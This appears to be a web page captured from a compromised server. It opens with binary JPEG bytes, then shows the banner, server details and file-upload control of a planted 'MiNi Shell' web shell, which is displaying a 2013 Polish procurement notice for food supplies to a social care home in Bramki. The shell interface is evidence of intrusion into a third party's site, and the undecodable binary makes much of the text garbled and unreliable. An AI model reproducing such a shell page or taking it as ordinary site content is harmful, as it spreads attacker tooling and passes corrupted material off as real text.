JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130606/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130606/101391-N-2013.html

<p class="kh_header"><b>Błonie: Dostawa artykułów żywnościowych dla Dom Pomocy Społecznej w Bramkach na II półrocze 2013 roku</b><br>
<b>Numer ogłoszenia: 101391 - 2013; data zamieszczenia: 06.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Bramkach , ul. Północna 18, 05-870 Błonie, woj. mazowieckie, tel. 0-22 7256127, faks 0-22 7256066.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpsbramki.org</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych dla Dom Pomocy Społecznej w Bramkach na II półrocze 2013 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZADANIE 1: Dostawa różnych artykułów spożywczych
Ananasy w puszce 565 g - 80 szt;
Aromaty 9 ml - 80 szt;
Bakalie (mieszanka) 200 g - 20 szt;
Barszcz biały 66 g	 - 210 szt;
Bazylia 10 g	 - 150 szt;
Brzoskwinie 820 g	- 100 szt;
Budyń czekoladowy 63 g - 200 szt;
Budyń śmietankowy 60 g - 200 szt;
Budyń bez cukru 60 g. - 150 szt;
Chrzan 320 g - 150 szt;
Cukier 1 kg	- 1950 kg;
Cukier puder 0,5 kg - 40 szt;
Cukier waniliowy 32 g - 140 szt;
Curry 20 g.	- 25 szt;
Cynamon 20g - 50 szt;
Czosnek mielony 20g - 250 szt;
Dżem niskosłodzony 280g - 800 szt;
Drożdże - 7 kg;
Fasola sucha Jaś 500 g - 110 kg;
Fasola czerwona konserwowa 400 g - 200 szt;
Galaretka owocowa z cukrem 79 g - 400 szt;
Gałka muszkatołowa 20 g - 50 szt;
Groszek konserwowy 400 g - 350 szt;
Herbata granulowana 100 g - 95 kg;
Kakao 100 g	- 100 szt;
Kasza gryczana 1 kg. - 150 kg;
Kasza jęczmienna 1 kg - 260 kg;
Kasza manna 1 kg	 - 130 kg;
Kawa zbożowa 250 g. - 50 szt;
Ketchup 500 g min.35% wkł. koncen. - 150 szt;
Kisiel z cukrem 77 g - 300 szt;
Kisiel bez cukru 77 g. - 150 szt;
Koncentrat pomidorowy 900 g	- 300 szt;
Konserwa rybna w oleju 170 g	 - 350 szt;
Konserwa rybna w pomidorach 170 g - 350 szt;
Kukurydza konserwowa 400 g	- 250 szt;
Kwasek cytrynowy 50 g	- 60 szt;
Liście laurowe 10 g - 125 szt;
Majeranek 10 g - 300 szt;
Majonez 420 g - 200 szt;
Mak 1000 g	- 15 kg;
Makaron nitki 500 g - 100 kg;
Makaron rurki 1 kg - 350 kg;
Makaron krajanka gruba	1 kg - 300 kg;
Makaron muszelki 1 kg. - 350 kg;
Makaron świderki 1 kg - 350 kg;
Mąka pszenna typ 480 1 kg. - 800 kg;
Mąka ziemniaczana 1 kg	 - 100 kg;
Musztarda 200 g	- 150 szt;
Ocet 0,5 l - 50 szt;
Ogórki konserwowe 900 g - 200 szt;
Olej 1 l - 350 l;
Oregano 10g - 150 szt;
Papryka konserwowa 850 g - 200 szt;
Papryka mielona ostra 20 g - 150 szt;
Papryka mielona słodka20 g - 150 szt;
Pasztet z drobiu 155 g - 350 szt;
Pieprz czarny ziarnisty 20 g. - 50 szt;
Pieprz naturalny mielony 15 g	- 520 szt;
Płatki owsiane 1 kg - 150 kg;
Płatki kukurydziane  - 150 kg;
Płatki jęczmienne 	- 100 kg;
Płatki żytnie - 50 kg;
Proszek do pieczenia 36 g - 270 szt;
Przyprawa do ryb 20 g - 75 szt;
Rodzynki 200 g - 50 szt;
Ryż 1 kg - 200 kg;
Sałatka szwedzka 850 g	 - 200 szt;
Sól 1kg - 250 kg;
Szczaw konserwowy 320 g - 160 szt;
Śliwki suszone 100 g - 5 kg;
Tymianek 10 g - 150 szt;
Vegetta 200 g ( lub równoważne ) - 400 szt;
Wiórki kokosowe - 25 szt;
Ziele angielskie 20 g - 100 szt;
Zupa grzybowa 37 g - 270 szt;
Zupa ogonowa 62 g - 210 szt;
Zupa pieczarkowa 44 g - 180 szt;
Żelatyna 50 g - 80 szt;
Soda oczyszczona 80 g	- 30 szt.

ZADANIE 2: Dostawa mięs, wędlin, drobiu i wyrobów drobiarskich.
Baleron odtłuszczony - 150 kg;
Baleron wędzony - 80 kg;
Baton drob. z kurczaka - 150 kg;
Boczek pieczony - 20 kg;
Boczek prasowany - 90 kg;
Boczek wędzony - 30 kg;
Golonka wieprzowa - 60 kg;
Karkówka b/k - 100 kg;
Kaszanka - 150 kg;
Kiełbasa biała - 60 kg;
Kiełbasa cytrynowa - 100 kg;
Kiełbasa dębicka - 95 kg; 
Kiełbasa krakowska - 100 kg;
Kiełbasa parówkowa - 100 kg;
Kiełbasa podwawelska - 100 kg; 
Kiełbasa szynk. wieprz. - 150 kg;
Kiełbasa zwyczajna - 150 kg;
Kiełbasa żywiecka	 - 100 kg;
Korpusy z indyka - 60 kg;
Korpusy z kurczaka - 150 kg;
Kości schabowe - 500 kg;
Kości wędzone - 100 kg;
Łopatka pieczona	- 80 kg;
Łopatka bez kości	 - 300 kg;
Mielonka wieprzowa - 100 kg;
Mięso wołowe gulaszowe b/k	- 200 kg;
Mięso wołowe b/k (antrykot) - 200 kg;
Mortadela - 120 kg;
Mortadela z warzywami	- 120 kg;
Nogi wieprzowe - 90 kg;
Nogi z kurczaka całe - 800 kg;
Ogonówka - 130 kg;
Parówki cienkie - 150 kg;  
Parówki drobiowe	- 200 kg;
Pasztet drob. pieczony - 160 kg;
Pasztetowa kremowa - 150 kg;
Pasztetowa drobiowa - 150 kg;
Pieczeń wiep. rzymska - 100 kg;
Piersi z kurczaka (filet)	- 660 kg;
Podgardle - 30 kg;
Polędwica drobiowa - 130 kg;
Polędwica sopocka - 40 kg;
Polędwica z warzywami - 120 kg;
Salceson włoski - 100 kg;
Salceson ozorkowy - 80 kg;
Schab bez kości - 120 kg;
Schab pieczony - 30 kg;
Słonina - 60 kg;
Szynka gotowana	 - 100 kg;
Szynka wędzona	- 100 kg;
Szynka drobiowa	- 120 kg;
Wątrobianka - 120 kg;
Wątroba drobiowa - 115 kg;
Wątroba wieprzowa - 130 kg;
Żebra paski	- 300 kg.

ZADANIE 3: Dostawa ryb.
Panga biała filet mrożony b/sk - 500 kg;
Ryba wędzona - 140 kg;
Śledź płaty - 150 kg.

ZADANIE 4. Dostawa owoców i warzyw.
Botwina - 120 pęczków;
Buraki czerwone - 300 kg;
Brokuły - 200 kg;
Cebula - 500 kg;
Cukinia - 150 kg;
Czosnek główki - 200 główek;
Dynia	- 200 kg;
Fasola szparagowa - 100 kg;
Gruszki - 200 kg;
Jabłka - 2000 kg;
Kalafior - 300 kg;
Kapusta biała - 250 kg;
Kapusta czerwona - 120 kg;
Kapusta kiszona - 300 kg;
Kapusta włoska - 200 kg;
Kapusta pekińska	- 220 szt;
Koper	- 400 pęczków;
Marchew - 1500 kg;
Natka	- 400 pęczków;
Ogórki kiszone - 300 kg;
Ogórki świeże - 400 kg;
Papryka świeża - 300 kg;
Pieczarki - 200 kg;
Pietruszka korzeń	- 450 kg;
Pomidory - 600 kg;
Por - 300 kg;
Rabarbar - 100 kg;
Sałata masłowa - 450 szt;
Sałata lodowa - 100 szt;
Seler	- 350 kg;
Szczypior - 400 pęczków;
Truskawki - 250 kg;
Ziemniaki - 10000 kg.

ZADANIE 5. Dostawa produktów mleczarskich.
Jogurt nat. w kubku 370 g. - 850 szt;
Masło rośli. w kostce 250 g. - 5700 szt;
Mleko 2% w folii 1 litr - 7300 l;
Ser biały chudy - 500 kg;
Ser topiony 100 g. - 1500 szt;
Ser żółty zawartość 13% tł. - 300 kg;
Śmietana 18 % - 1 litr - 150 l;
Śmietana 30 % - 1 litr - 20 l;

ZADANIE 6: Dostawa pieczywa.
Bułki paryskie 450 g - 7500 szt;
Bułki kajzerki 50 g - 300 szt;
Bułki słodkie 100 g - 200 szt;
Chleb pszenno - żytni 500 g - 4500 szt;
Chleb razowy 500 g - 1600 szt.

ZADANIE 7: Dostawa jaj.
Jaja  klasa A 65 - 70 g	- 22000 szt;

ZADANIE 8: Dostawa owoców cytrusowych
Banany - 300 kg;
Cytryny - 100 kg..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu, o których mowa w art. 24 ust. 1 ustawy z dnia 29.01.2004 roku - Prawo Zamówień Publicznych, należy przedłożyć:
oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 według wzoru określonego w załączniku nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy przedłożyć wykaz wykonanych o okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia dostaw ( w przypadku świadczeń okresowych lub ciągłych również wykonywanych), a jeśeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym podmiot zamówienia - załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez  Zamawiającego, Wykonawcy zobowiązani są załączyć do oferty dokument potwierdzający stosowanie wdrożonego systemu HACCP albo oświadczenie Wykonawcy potwierdzające stosowanie zasad dobrej praktyki higienicznej (GHP).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpsbramki.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Bramkach ul. Północna 18; 05-870 Błonie, pokój nr 17..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2013 godzina 11:00, miejsce: Dom Pomocy Społecznej w Bramkach ul. Północna 18; 05-870 Błonie, pokój nr 17..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com